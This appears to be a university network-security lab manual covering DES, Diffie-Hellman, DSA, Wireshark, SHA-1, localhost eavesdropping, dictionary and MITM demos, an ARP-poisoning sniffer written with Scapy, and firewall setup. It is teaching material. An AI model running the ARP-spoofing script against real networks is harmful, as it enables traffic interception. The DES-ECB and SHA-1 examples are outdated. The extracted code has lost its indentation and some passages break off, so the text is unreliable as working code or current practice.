LIST OF EXPERIMENTS

Ex. Date Name of the Experiment Pg. No

No.

1 Implementing symmetric key algorithms –DES

2 Implementing Key exchange algorithms

3. Implement the SIGNATURE SCHEME –

Digital Signature Standard.

4. Installation of Wire shark, tcpdump and observe

data transferred in client-servercommunication
using UDP/TCP and identify the UDP/TCP
datagram.

5. Check message integrity and confidentiality using SSL

6. Experiment Eavesdropping, Dictionary attacks,

MITM attacks

7 Experiment with Sniff Traffic using ARP Poisoning

8 Demonstrate intrusion detection system using any tool.

9 Explore network monitoring tools

10 Study to configure Firewall, VPN

DATE: DATA ENCRYPTION STANDARD (DES)

EX.NO:1 ALGORITHM (USER MESSAGE ENCRYPTION)

AIM:

To use Data Encryption Standard (DES) Algorithm for a practical application like
User Message Encryption.

ALGORITHM:
1. Create a DES Key.
2. Create a Cipher instance from Cipher class, specify the following
information and separated by a slash (/).
a. Algorithm name
b. Mode (optional)
c. Padding scheme (optional)
3. Convert String into Byte[] array format.
4. Make Cipher in encrypt mode, and encrypt it with Cipher.doFinal() method.
5. Make Cipher in decrypt mode, and decrypt it with Cipher.doFinal() method.

PROGRAM:

pip install pycryptodome

from Crypto.Cipher import DES

from Crypto.Random import
get_random_bytes

# Generate a random key

key = get_random_bytes(8) # DES
key must be 8 bytes
cipher = DES.new(key,
DES.MODE_ECB)

# Padding function to ensure data is

aligned to the block size
def pad(text):
while len(text) % 8 != 0:
text += b' ' # Padding with
spaces
return text

# Encrypt a message
plaintext = b'Secret Information'
padded_plaintext = pad(plaintext)
ciphertext =
cipher.encrypt(padded_plaintext)
print(f'Encrypted: {ciphertext}')

7
# Decrypt the message
cipher_dec = DES.new(key,
DES.MODE_ECB)
decrypted_padded =
cipher_dec.decrypt(ciphertext)
decrypted =
 decrypted_padded.rstrip(b' ') #
Removing the padding
print(f'Decrypted: {decrypted.decode()}')

OUTPUT:

Encrypted: b'/p\x04\x07@\xd0\x9a\xf0\x8e\xe5[i\xc9q>F\xdf\x8d)/\xff\xefS\xfa'

Decrypted: Secret Information

RESULT:
Thus the Python program for DES Algorithm has been implemented and the output
verified successfully.

8
DATE: DIFFIE-HELLMAN KEY EXCHANGE ALGORITHM
EX.NO:2
AIM:

To implement the Diffie-Hellman Key Exchange algorithm for a given problem

. ALGORITHM:

Step 1: Alice and Bob publicly agree to use a modulus p = 23 and base g = 5
(which is a primitive root modulo 23).
Step 2: Alice chooses a secret integer a = 4, then sends Bob A = ga mod p a.
A = 54 mod 23 = 4
Step 3: Bob chooses a secret integer b = 3, then sends Alice B = gb mod p a.
B = 53 mod 23 = 10
Step 4: Alice computes s = Ba mod p
a. s = 104 mod 23 = 18
Step 5: Bob computes s = Ab mod p
a. s = 43 mod 23 = 18
Step 6: Alice and Bob now share a secret (the number 18).

PROGRAM:

# Publicly agreed parameters

p = 23 # Prime modulus
g = 5 # Base (primitive root modulo p)

# Alice's secret integer

a=4
A = pow(g, a, p) # A = g^a mod p
print(f"Alice's public value A: {A}")

# Bob's secret integer

b=3
B = pow(g, b, p) # B = g^b mod p
print(f"Bob's public value B: {B}")

# Alice computes the shared secret

shared_secret_A = pow(B, a, p) # s = B^a mod p
print(f"Alice's shared secret: {shared_secret_A}")

# Bob computes the shared secret

shared_secret_B = pow(A, b, p) # s = A^b mod p
print(f"Bob's shared secret: {shared_secret_B}")

# Verify that both shared secrets are the same

assert shared_secret_A == shared_secret_B
print("Diffie-Hellman Key Exchange Successful")

9
OUTPUT:

Alice's public value A: 4

Bob's public value B: 10
Alice's shared secret: 18
Bob's shared secret: 18
Diffie-Hellman Key Exchange Successful

RESULT:
Thus the Diffie-Hellman key exchange algorithm has been implemented using Python
Program and the output has been verified successfully.
 10

DATE: DIGITAL SIGNATURE STANDARD

EX.NO:3

AIM:

To implement the SIGNATURE SCHEME - Digital Signature Standard.

ALGORITHM:

1. Create a KeyPairGenerator object.

2. Initialize the KeyPairGenerator object.
3. Generate the KeyPairGenerator. ...
4. Get the private key from the pair.
5. Create a signature object.
6. Initialize the Signature object.
7. Add data to the Signature object
8. Calculate the Signature

PROGRAM:
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import utils

# Generate DSA key pair

private_key = dsa.generate_private_key(key_size=2048)
public_key = private_key.public_key()

# Message to sign
message = b'This is a message for digital signature'

# Sign the message

signature = private_key.sign(message, hashes.SHA256())
print(f'Digital signature for given text: {signature}')

11
# Verify the signature
public_key.verify( signature, message, hashes.SHA256())
print("Signature verified successfully.")

OUTPUT:
Digital signature for given text: b'0E\x02
\x1e\xce\x13\xdb\t\x94]AW]\xbcl\xa6\x11\xfd\x8e\xd4jv.\x9c{\xcc,\xd3d\x04\xbfdT\xee\xac\
x02!\x00\x83\xcb\xa7\xbfaW\xbbrU\x9ao\xf3<\xe1\xcd\xda\x1b\x13`\xe3\xcbGg\x01\xbe\xd
dJ\xb5\xfby\x8d\x9b'
Signature verified successfully.
RESULT:
Thus the Digital Signature Standard Signature Scheme has been implemented and the output
has been verified successfully.

12

DATE: INSTALLATION OF WIRE SHARK, TCPDUMP AND

EX.NO:4 OBSERVE DATA TRANSFERRED IN CLIENT- SERVER
COMMUMICATION USING UDP/TCP AND IDENTIFY
THE UDP/TCP DATAGRAM

AIM:
To perform the installation of Wire shark, tcpdump and observe data transferred in
client-server communication using UDP/TCP and identify the UDP/TCP datagram.
INTRODUCTION:

The first part of the lab introduces packet sniffer, Wireshark. Wireshark is a free open
source network protocol analyzer. It is used for network troubleshooting and
communication protocol analysis. Wireshark captures network packets in real time
and display them in human-readable format. It provides many advanced features
including live capture and offline analysis, three-pane packet browser, coloring rules
for analysis. This document uses Wireshark for the experiments, and it covers
Wireshark installation, packet capturing, and protocol analysis.

Figure 1: Wireshark in Kali Linux

13
Background TCP/IP Network Stack
Figure 2: Encapsulation of Data in the TCP/IP Network Stack In the CSC 4190 Introduction
to Computer Networking (one of the perquisite courses), TCP/IP network stack is introduced
and studied. This background section briefly explains the concept of TCP/IP network stack
to help you better understand the experiments. TCP/IP is the most commonly used network
model for Internet services. Because its most important protocols, the Transmission Control
Protocol (TCP) and the Internet Protocol (IP) were the first networking protocols defined in
this standard, it is named as TCP/IP. However, it contains multiple layers including
application layer, transport layer, network layer, and data link layer.

- Application Layer: The application layer includes the protocols used by most applications
for providing user services. Examples of application layer protocols are Hypertext

Packet Sniffer

Packet sniffer is a basic tool for observing network packet exchanges in a computer. As
the name suggests, a packet sniffer captures (“sniffs”) packets being sent/received
from/by your computer.

14
The second component of a packet sniffer is the packet analyzer, which displays the
contents of all fields within a protocol message. In order to do so, the packet analyzer
 Packet
Sniffer Structure

For example, suppose we are interested in displaying the various fields in messages
exchanged by the HTTP protocol in Figure 3. The packet analyzer understands the
format of Ethernet frames, and so can identify the IP datagram within an Ethernet frame.
It also understands the IP datagram format, so that it can extract the TCP segment within
the IP datagram. Finally, it understands the TCP segment structure, so it can extract the
HTTP message contained in the TCP segment. Finally, it understands the HTTP protocol
and so, for example, knows that the first bytes of an HTTP message will contain the
string “GET,” “POST,” or “HEAD”.

We will be using the Wireshark packet sniffer [http://www.wireshark.org/] for these labs,
allowing us to display the contents of messages being sent/received from/by protocols at
different levels of the protocol stack. (Technically speaking, Wireshark is a packet
analyzer that uses a packet capture library in your computer). Wireshark is a free network
protocol analyzer that runs on Windows, Linux/Unix, and Mac computers.

Getting Wireshark
The Kai Linux has Wireshark installed. You can just launch the Kali Linux VM and
open Wireshark there.Wireshark can also be downloaded from here:

https://www.wireshark.org/download.html

lOMoARcPSD|24630861
15
Starting Wireshark:
When you run the Wireshark program, the Wireshark graphic user interface will be shown
as Figure 5.Currently, the program is not capturing the packets.Capture Interfaces in
Wireshark

Capturing Packets in Wireshark

lOMoARcPSD|24630861
16

(Wireshark Graphical User Interface on Microsoft Windows)

The Wireshark interface has five major components:

 The command menus are standard pulldown menus located at the top of the window. Of
interest to us now is the File and Capture menus. The File menu allows you to save captured
packet data or open a file containing previously captured packet data, and exit the Wireshark

lOMoARcPSD|24630861
17

application. The Capture menu allows you to begin packet capture.

The packet-listing window displays a one-line summary for each packet captured,
including the packet number (assigned by Wireshark; this is not a packet number
contained in any protocol’s header), the time at which the packet was captured, the
packet’s source and destination addresses, the protocol type, and protocol-specific
information contained in the packet. The packet listing can be sorted according to any of
these categories by clicking on a column name. The protocol type field lists the highest
level protocol that sent or received this packet, i.e., the protocol that is the source or
ultimate sink for this packet.

The packet-header details window provides details about the packet selected
(highlighted) in the packet-listing window. (To select a packet in the packet-listing
window, place the cursor over the packet’s one- line summary in the packet-listing
window and click with the left mouse button.). The packet-contents window displays
the entire contents of the captured frame, in both ASCII and hexadecimal format.

Towards the top of the Wireshark graphical user interface, is the packet display filter
field, into which a protocol name or other information can be entered in order to filter
the information displayed in the packet-listing window (and hence the packet-header
and packet-contents windows). In the examplebelow, we’ll use the packet-display filter
field to have Wireshark hide (not display) packets except those that correspond to
HTTP messages.

Capturing Packets
After downloading and installing Wireshark, you can launch it and click the name of an
interface under Interface List to start capturing packets on that interface. For example,
 if you want to capture traffic on the wireless network, click your wireless interface.

Test Run
Do the following steps:

1. Start up the Wireshark program (select an interface and press start

to capture packets).
2. Start up your favorite browser (ceweasel in Kali Linux).
3. In your browser, go to Wayne State homepage by typing www.wayne.edu.
4. After your browser has displayed the http://www.wayne.edu page, stop
Wireshark packet capture by selecting stop in the Wireshark capture window.

lOMoARcPSD|24630861
18

This will cause the Wireshark capture window to disappear and the main
Wireshark window to display all packets captured since you began packet
capture see image below:
 5. Color Coding: You’ll probably see packets highlighted in green, blue, and
black. Wireshark uses colors to help you identify the types of traffic at a
glance. By default, green is TCP traffic, dark blue is DNS traffic, light blue is UDP
traffic, and black identifies TCP packets with problems — for example, they could
have been delivered out-of-order.
6. You now have live packet data that contains all protocol messages exchanged
between your computer and other network entities! However, as you will

lOMoARcPSD|24630861
19

notice the HTTP

7. messages are not clearly shown because there are many other packets included
in the packet capture. Even though the only action you took was to open your
browser, there are many other programs in your computer that communicate
via the network in the background. To filter the connections to the ones we
want to focus on, we have to use the filtering functionality of Wireshark by
typing “http” in the filtering field as shown below:
8. Notice that we now view only the packets that are of protocol HTTP.
However, we also still do not have the exact communication we want to focus
on because using HTTP as a filter is not descriptive enough to allow us to find
our connection to http://www.wayne.edu. We need to be more precise if we
want to capture the correct set of packets.

9. To further filter packets in Wireshark, we need to use a more precise filter. By

setting the http.host www.wayne.edu, we are restricting the view to packets that
have as an http host the www.wayne.edu website. Notice that we need two equal
signs to perform the match not just one. See the screenshot below:
 10. Now, we can try another protocol. Let’s use Domain Name
System (DNS) protocol as an example here.

lOMoARcPSD|24630861
20

Let’s try now to find out what are those packets contain by following conversations (also
called network flows), select one of the packets and press the right mouse button (if you are
on a Mac use the command button and click), you should see something similar to the screen
below:
 Click on
Follow UDP Stream, and then you will see following screen.

21
lOMoARcPSD|24630861
 1. If we close this window and change the filter back to “http.hos ww.wayne.edu”
and then follow a packetfrom the list of packets that match that filter, we should get
the something similar to the following screens. Note that we click on Follow TCP
Stream this time.

RESULT:

Thus, the installation of Wire shark, tcpdump is performed and data transferred is
observed in client-server communication using UDP/TCP and the UDP/TCP datagram
is identified.
lOMoARcPSD|24630861
22

DATE: CHECK MESSAGE INTEGRITY AND

EX.NO:5 CONFIDENTIALITY USING SSL DATE:

AIM:

To Calculate the message digest of a text using the SHA-1 algorithm.

ALGORITHM:

1. Append Padding Bits

2. Append Length - 64 bits are appended to the end 3.
Prepare Processing Functions

4. Prepare Processing Constants

5. Initialize Buffers
6. Processing Message in 512-bit blocks (L blocks in total message)

PROGRAM:
import hashlib
def sha1_hash(input_data):
sha1 = hashlib.sha1()
sha1.update(input_data.encode())
return sha1.hexdigest()

# Test inputs
inputs = ["", "abc", "abcdefghijklmnopqrstuvwxyz"]

# Print SHA-1 hashes

for input_data in inputs:
print(f'SHA1("{input_data}") = {sha1_hash(input_data)}')
lOMoARcPSD|24630861
23

OUTPUT:
SHA1("") = da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA1("abc") = a9993e364706816aba3e25717850c26c9cd0d89d
SHA1("abcdefghijklmnopqrstuvwxyz") = 32d10c7b8cf96570ca04ce37f2a19d84240d3a89
RESULT:
Thus the Secure Hash Algorithm (SHA-1) has been implemented and the output has been
verified successfully.

lOMoARcPSD|24630861
24
 DATE: EXPERIMENT EAVESDROPPING, DICTIONARY
EX.NO:6 ATTACKS, MITM ATTACKS

AIM:
To experiment eavesdropping, Dictionary attacks, MIMT attacks

ALGORITHM:

Eavesdropping:
Step 1: Set Up the Server
• Create a socket for the server.
• Bind the server socket to a specific address and port (localhost, 8080). •
Listen for incoming connections and accept a connection.

• Receive data from the client, print the received message, and send the data back to the
client.
• Close the connection.
Step 2: Set Up the Client
• Create a socket for the client.
• Connect the client socket to the server's address and port (localhost, 8080). •
Send a message from the client to the server.

• Print the sent message.

• Receive the echoed message from the server and print it.
• Close the connection.
Step 3: Execute Server and Client in Separate Threads
• Create and start a thread for the server function.
• Create and start a thread for the client function.
• Wait for both threads to complete execution.

Dictionary attack:
Step 1: Import the Required Library
• Import the hashlib library for hashing.
lOMoARcPSD|24630861
25

Step 2: Define the Dictionary of Potential Passwords

• Create a list called dictionary containing potential passwords.
Step 3: Define the Hashed Password to be Cracked
• Hash the known password ("password1") using SHA-256 and store the hashed value
in hashed_password.
Step 4: Perform the Dictionary Attack
• Loop through each word in the dictionary:
o Hash the current word using SHA-256.
o Compare the hashed value of the current word with the hashed value of the
known password (hashed_password).
o If they match, print the word and break out of the loop.

Man-in-the-Middle (MITM) Attack:

Step 1: Set Up the MITM Server
• Create a socket for the MITM server.
• Bind the server socket to localhost on port 8080.
• Listen for incoming connections.
• Accept a connection and receive data from the client.
• Modify the received data and print it.
• Send the modified data back to the client.
• Close the connection.
Step 2: Set Up the Client
• Create a socket for the client.
• Connect the client socket to the MITM server's address and port (localhost, 8080). •
Send a message from the client to the server.

• Print the sent message.

 • Receive the modified message from the server and print it.
• Close the connection.
Step 3: Execute MITM Server and Client in Separate Threads
• Create and start a thread for the MITM server function.
• Create and start a thread for the client function.

lOMoARcPSD|24630861
26

PROGRAM:
Eavesdropping:
import socket, threading

# Server function
def server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 8080))
s.listen(1)
conn, _ = s.accept()
data = conn.recv(1024).decode()
print(f"Server received: {data}")
conn.send(data.encode())
conn.close()

# Client function
def client():
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('localhost', 8080))
msg = "Hello, Server!"
c.send(msg.encode())
print(f"Client sent: {msg}")
print(f"Client received: {c.recv(1024).decode()}")
c.close()

# Start server and client

threading.Thread(target=server).start()
threading.Thread(target=client).start()

OUTPUT:
Client sent: Hello, Server!
Server received: Hello, Server!
Client received: Hello, Server!
 Dictionary attack:

import hashlib

# Dictionary of potential passwords

dictionary = ["password", "123456", "admin", "letmein", "password1"]

# Hashed password to be cracked

hashed_password = hashlib.sha256("password1".encode()).hexdigest()

# Perform dictionary attack

for word in dictionary:
if hashlib.sha256(word.encode()).hexdigest() == hashed_password:
print(f"Password found: {word}")
break

lOMoARcPSD|24630861
27

OUTPUT:
Password found: password1

Man-in-the-Middle (MITM) Attack:

import socket, threading

# MITM server function

def mitm_server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 8080))
s.listen(1)
conn, _ = s.accept()
data = conn.recv(1024).decode()
modified_data = data.replace("Hello", "Intercepted")
print(f"MITM modified: {modified_data}")
conn.send(modified_data.encode())
conn.close()

# MITM client function

def mitm_client():
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('localhost', 8080))
msg = "Hello, Server!"
c.send(msg.encode())
print(f"Client sent: {msg}")
 print(f"Client received: {c.recv(1024).decode()}")
c.close()

# Start the MITM server and client

threading.Thread(target=mitm_server).start()
threading.Thread(target=mitm_client).start()

OUTPUT:
Client sent: Hello, Server!
MITM modified: Intercepted, Server!
Client received: Intercepted, Server!

RESULT :
Thus the programs for Eavesdropping, Dictionary attacks, MITM attacks were implemented
successfully.

lOMoARcPSD|24630861
28

DATE: PERFORM AN EXPERIMENT TO SNIFF TRAFFIC

EX.NO:7 USING ARP POISONING

AIM:

Perform an Experiment to Sniff Traffic using ARP Poisoning.

DESCRIPTION:
ARP is the acronym for Address Resolution Protocol. It is used to convert IP address to
physical addresses [MAC address] on a switch. The host sends an ARP broadcast on the
network, and the recipient computer responds with its physical address [MAC Address]. The
resolved IP/MACaddress is then used to communicate. ARP poisoning is sending fake MAC
addresses to the switch so that it can associate the fake MAC addresses with the IP address of
a genuine computer on a network and hijack the traffic.
Scapy is a powerful Python library used for network packet manipulation, including creating,
sending, and sniffing network packets. Here’s a complete example using Scapy to perform
ARP poisoning and sniff traffic.

ALGORITHIM:
Step 1: Install scapy

• Ensure the scapy library is installed on your system.

Step 2: Import Necessary Libraries

• Import ARP, send, sniff from scapy.all.

• Import signal and sys.

Step 3: Define Function poison to Perform ARP Poisoning

• Create the poison function to send spoofed ARP responses to both the target and
gateway.

Step 4: Define Function restore to Restore ARP Tables

• Create the restore function to send correct ARP responses and restore the ARP tables
to their original state.

Step 5: Define Function sniff_packets to Sniff Packets

• Create the sniff_packets function to print the summary of each captured packet.

Step 6: Define signal_handler to Restore Network on Script Interruption

lOMoARcPSD|24630861
29

• Create the signal_handler function to restore the ARP tables and exit the script
gracefully when interrupted.

Step 7: Register the Signal Handler

• Use signal.signal to register the signal_handler function to handle the interrupt signal
(SIGINT).

Step 8: Initialize Example IPs and MAC Addresses

• Define example IPs and MAC addresses for the target and gateway (replace with
 actual values from your network).

Step 9: Start ARP Poisoning and Sniff Packets

• In a try block, start ARP poisoning using the poison function and sniff packets using
the sniff_packets function in a loop.

• Ensure the signal_handler restores the network when the script is interrupted.

PROGRAM:

pip install scapy

from scapy.all import ARP, send, sniff
import signal
import sys

# Function to perform ARP poisoning

def poison(target_ip, gateway_ip, target_mac, gateway_mac):
send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac), verbose=False)
send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac), verbose=False)

# Function to restore ARP tables

def restore(target_ip, gateway_ip, target_mac, gateway_mac):
send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwsrc=gateway_mac,
hwdst=target_mac), count=3, verbose=False)
send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwsrc=target_mac,
hwdst=gateway_mac), count=3, verbose=False)

# Function to sniff packets

def sniff_packets(packet):
print(f"Packet: {packet.summary()}")

# Signal handler to restore network on script interruption

def signal_handler(sig, frame):
print("Stopping ARP poisoning. Restoring network...")

lOMoARcPSD|24630861
30

restore(target_ip, gateway_ip, target_mac, gateway_mac)

print("Network restored.")
sys.exit(0)

# Example IPs and MAC addresses (use real values from your
network) target_ip = "192.168.1.2"
gateway_ip = "192.168.1.1"
target_mac = "00:00:00:00:00:02" # Replace with actual MAC address
gateway_mac = "00:00:00:00:00:01" # Replace with actual MAC
address

# Register the signal handler

signal.signal(signal.SIGINT, signal_handler)

try:
print("Starting ARP poisoning... Press Ctrl+C to stop.")
while True:
poison(target_ip, gateway_ip, target_mac, gateway_mac)
sniff(filter="ip", prn=sniff_packets, count=10) # Sniff packets
except KeyboardInterrupt:
pass # This block is now handled by signal_handler

OUTPUT:

WARNING: You should be providing the Ethernet destination MAC address when
sending an is-at ARP.
Starting ARP poisoning... Press Ctrl+C to stop.
WARNING: MAC address to reach destination not found. Using broadcast. WARNING:
You should be providing the Ethernet destination MAC address when sending an is-at
ARP.
Packet: Ether / IP / TCP 192.168.1.36:55471 > 192.168.1.25:8009 PA / Raw
Packet: Ether / IP / TCP 192.168.1.36:55472 > 192.168.1.25:8009 PA / Raw
……. …….
…….
After stopping the script:
Stopping ARP poisoning. Restoring network...

RESULT:
Thus the experiment to Sniff Traffic using ARP Poisoning was performed.

lOMoARcPSD|24630861
31
 DATE: DEMONSTRATION OF INTRUSION

EX.NO:8 DETECTION SYSTEM(IDS) USING ANY TOOL

AIM:

To demonstrate Intrusion Detection System(IDS) using Pandas, a Python library for data
manipulation and analysis.
ALGORITHM:
Step 1: Load the Data
• Create a synthetic dataset with features and labels indicating whether the network
traffic is normal or an attack.
• Load the dataset into a DataFrame using Pandas.
Step 2: Define the Detection Rule
• Create a function rule_based_detection that takes a row of the DataFrame and returns
'Attack' if specific conditions are met (e.g., Feature1 == 1 and Feature2 == 2),
otherwise 'Normal'.
Step 3: Apply the Rule to Detect Intrusions
• Use the apply method in Pandas to apply the rule_based_detection function to each
row of the DataFrame and create a new column for detected labels (Detected).
Step 4: Evaluate the Detection
• Use a confusion matrix to compare the detected labels (Detected) with the actual
labels (Label). The pd.crosstab function in Pandas helps generate this matrix for
evaluation.

PROGRAM:
import pandas as pd
# Sample synthetic dataset
data = {
'Feature1': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'Feature2': [1, 1, 2, 2, 1, 1, 2, 2, 1, 1],
'Label': ['Normal', 'Normal', 'Attack', 'Attack', 'Normal', 'Normal', 'Attack', 'Attack',
'Normal', 'Normal']
}
lOMoARcPSD|24630861
32

# Create a DataFrame
df = pd.DataFrame(data)

# Rule-based function to detect intrusion

df['Detected'] = df.apply(lambda row: 'Attack' if row['Feature1'] == 1 and row['Feature2'] ==
2 else 'Normal', axis=1)

# Evaluate the rule-based detection

print(pd.crosstab(df['Label'], df['Detected'], rownames=['Actual'], colnames=['Predicted']))

OUTPUT:
Predicted Attack Normal
Actual
Attack 2 2
Normal 0 6
RESULT:
Thus the program to demonstrate Intrusion Detection System(IDS) using Pandas, a
Python library for data manipulation and analysis is implemented successfully

lOMoARcPSD|24630861
33

DATE: EXPLORE NETWORK MONITORING TOOLS

EX.NO:9

AIM :

To explore about Network monitoring tools\

NETWORK MONITORING:
Network monitoring is an essential part of network management. It involves using various
tools to monitor a system network and determine slowness and weak connections, among
other issues. Knowing more about these tools can help you understand them better and use
the right ones that suit your requirements.

What Are Network Monitoring Tools?

Network monitoring tools are software that you can use to evaluate network connections.
These software programs can help you monitor a network connection and identify network
issues, which may include failing network components, slow connection speed, network
outage or unidentifiable connections.

Network Monitoring Tools

Here are eight monitoring tools along with their descriptions and
features: 1. SolarWinds Network Performance Monitor

SolarWinds Network Performance Monitor is a multi-vendor monitoring tool. It allows users

to monitor multiple vendors' networks at the same time. It also provides network insights for
thorough visibility into the health of the networks.

2. Auvik

Auvik is a network monitoring and management tool. It offers a quick implementation process
that helps users to set up the tool easily. It also has a clean user interface that makes it easy to
navigate and use. The tool provides in-depth network visibility that enables faster
troubleshooting for network issues. Users can automate network visibility using Auvik. It
provides real-time updates on network issues and configuration changes.

3. Datadog Network Monitoring

Datadog Network Monitoring offers services for on-premises devices and cloud networks. A
highlighting feature of this tool is the visualisations. It offers various graphical representations
of all

4. Paessler PRTG Network Monitor

Paessler's network connection monitoring tool provides a clean user interface and network
visibility on multiple devices. Users can track the health of different connection types like
local area networks (LAN), wide area network (WAN), servers, websites, applications and
services.

lOMoARcPSD|24630861
34

5. ManageEngine OpManager

ManageEngine OpManager is a good network monitoring and managing tool for users that
prefer in- depth view of network health and issues. This tool provides over 2000 network
performance monitors that allow users to track and monitor their connections and perform
detailed analyses on issues.

6. Domotz

Domotz is an expansive tool that provides a list of features for monitoring network
connections. It allows users to customise their network monitoring preferences. Users can
write scripts the retrieve the data they wish to evaluate. It also allows connection to open
ports on remote devices while ensuring network security. Users can also scan and monitor
network connections globally. Domotz also allows to backup and restore network
configuration for switches, firewalls and access points and alerts when there is a change in
the configuration.

7. Checkmk

Checkmk is a tool that allows users to automate it completely. You can customise its
operations and enable it to perform tasks automatically. It also identifies network and security
components without the user requiring manual set up. For example, the tool can identify a
firewall even if the user has not set it up. Its Agent Bakery feature enables users to manage
agents and automate agent updating. This reduces manual effort to monitor network
connections. The tool also includes over 2000 plug-ins for enhancing network monitoring.

8. Progress Whatsup Gold

Progress Whatsup Gold is a basic network monitoring software. It provides a minimal user
interface with essential features like device monitoring, application monitoring, analysing
network traffic and managing configurations. The tool allows users to monitor cloud devices,
inspect suspicious connections, automate configuration backups and identify, and resolve
bandwidth issues.

Other Tools For Network Monitoring

Here are three additional tools for network monitoring:

• Fortra Intermapper: This tool enables users to monitor network connections using network
maps, allowing them to get a holistic view of all the connections. It also provides various
colour codes for different network status, along with real-time notifications through text,
email and sound.

• Nagios Core: Nagios Core is a monitoring engine that works as the primary application for
all

• Nagios projects, including the Nagios Network Analyser.

• Zabbix: Zabbix provides a thorough network monitoring solution with features like server
monitoring, cloud monitoring, application monitoring and service monitoring. The tool

lOMoARcPSD|24630861
35

also includes features like metric collection, business monitoring and root cause analyses of
network issues, and allows users to establish a threshold for connection anomalies.
Tips To Choose A Network Monitoring And Management Tool

Here are some useful tips that you can consider while selecting a tool for network
monitoring: Understand the requirements

Understanding why you require network monitoring software is important in the process.
Define what feature you want and for what purpose. This can help you identify the right tool
for your use. It may also help you choose the correct subscription plan on paid tools.

Browse multiple tools

Once you identify the requirements, consider browsing multiple tools. Visit the websites of
the tools and look for the features you require. Spend time studying the features and
understand how they can be useful to your requirements. You can also identify a few tools
and compare their features to each other.

Consider the budget

Some tools may be free to use, while some may require you to purchase a subscription plan.
Paid tools typically offer a free trial period of up to 30 days. Once you identify which tool you
may like to use, see if it is free or requires payment. If it is a paid tool, try exploring its
features and efficiency during the trial period. Consider keeping a backup tool in case the tool
that you choose does not fit your usage.

RESULT:

Thus the network monitoring tools was explored.

lOMoARcPSD|24630861
36
 DATE: STUDY TO CONFIGURE FIREWALL, VPN
EX.NO:10

AIM:

To study the features of firewall in providing network security and to set Firewall Security in
windows.

Firewall in Windows 7

Windows 7 comes with two firewalls that work together. One is the Windows Firewall, and the
other is Windows Firewall with Advanced Security (WFAS). The main difference between
them is the complexity ofthe rules configuration. Windows Firewall uses simple rules that
directlyrelate to a program or a service. The rules in WFAS can be configured based on
protocols, ports, addresses and authentication. By default, both firewalls come with predefined
set of rules that allow us to utilize network resources. This includes things like browsing the
web, receiving e-mails, etc. Other standard firewall exceptions are File and Printer Sharing,
Network Discovery, Performance Logs and Alerts, Remote Administration, Windows Remote
Management, Remote Assistance, Remote Desktop, Windows Media Player, Windows Media
Player Network Sharing Service

With firewall in Windows 7 we can configure inbound and outbound rules. By default, all
outbound traffic is allowed, and inbound responses to that traffic are also allowed. Inbound
traffic initiated from external sources is automatically blocked.

When we first connect to some network, we are prompted to select a network location. This
feature is known as Network Location Awareness(NLA). This feature enables us to assign a
network profile to the connection based on the location. Different network profiles contain
different collections of firewall rules. In Windows 7, different network profiles can be
configured on different interfaces. For example, our wired interface can have different profile
than our wireless interface. There are three different network profiles available:

• Public
• Home/Work - private network
• Domain - used within a domain

Configuring Windows Firewall

lOMoARcPSD|24630861
37

To open Windows Firewall we can go to Start > Control Panel > Windows

Firewall.
By default, Windows Firewall is enabled for both private (home or work)and public
networks. It is also configured to block all connections to programs that are not on the list of
allowed programs. To configure exceptions we can go to the menu on the left and select
"Allow a program or feature trough Windows Firewall" option.
Exceptions:

To change settings in this window we have to click the "Change settings" button. As you can
see, here we have a list of predefined programs and features that can be allowed to
communicate on private or public networks. For example, notice that the Core Networking
feature is allowed

lOMoARcPSD|24630861
38

on both private and public networks, while the File and Printer Sharing is only allowed on
private networks. We can also see the details of the items in the list by selecting it and then
clicking the Details button.
Details

If we have a program on our computer that is not in this list, we can manually add it by
clicking on the "Allow another program" button.

Add a Program
Here we have to browse to the executable of our program and then click the Add button.
Notice that we can also choose location types on which this program will be allowed to
communicate by clicking on the "Network location types" button.
Network Locations
Many applications will automatically configure proper exceptions in Windows Firewall
when we run them. For example, if we enable streaming from Media Player, it will
automatically configure firewall settings to allow streaming. The same thing is if we enable
Remote Desktop feature from the system properties window. By enabling Remote Desktop
feature we actually

lOMoARcPSD|24630861
39

create an exception in Windows Firewall.

Windows Firewall can be turned off completely. To do that we can select the "Turn Windows
Firewall on or off" option from the menu on the left.
 Firewall Customization

Note that we can modify settings for each type of network location (private or public).
Interesting thing here is that we can block all incoming connections, including those in the
list of allowed programs.

Windows Firewall is actually a Windows service. As you know, services can be stopped and
started. If the Windows Firewall service is stopped, the Windows Firewall will not work.

Firewall Service

In our case the service is running. If we stop it, we will get a warning thatwe should turn on
our Windows Firewall

Warning

Remember that with Windows Firewall we can only configure basic firewall settings, and this is
enough for most day-to-day users. However, we can't configure exceptions based on ports in
Windows Firewall any more. For that we have to use Windows Firewall with Advanced
Security.

How to Start & Use the Windows Firewall with Advanced Security
The Windows Firewall with Advanced Security is a tool which gives you detailed control
over the rules that are applied by the Windows Firewall. You can view all the rules that are
used by the Windows Firewall, change their properties, create new rules or disable existing
ones. In this tutorial we will share how to open the Windows Firewall with Advanced
Security, how to

lOMoARcPSD|24630861
40
 find your way around it and talk about the types of rules that are available and what kind of
traffic they filter.

How to Access the Windows Firewall with Advanced Security

You have several alternatives to opening the Windows Firewall with Advanced Security:

One is to open the standard Windows Firewall window, by going to "Control Panel ->
System and Security -> Windows Firewall". Then, click or tap Advanced settings.

In Windows 7, another method is to search for the word firewall in the Start Menu search
box and click the "Windows Firewall with Advanced Security" result.

In Windows 8.1, Windows Firewall with Advanced Security is not returned in search results
and you need to use the first method shared above foropening it.

The Windows Firewall with Advanced Security looks and works the same both in Windows
7 and Windows 8.1. To continue our tutorial, we will use screenshots that were made in
Windows 8.1.
lOMoARcPSD|24630861
41

What Are The Inbound & Outbound Rules?

In order to provide the security you need, the Windows Firewall has a standard set of inbound
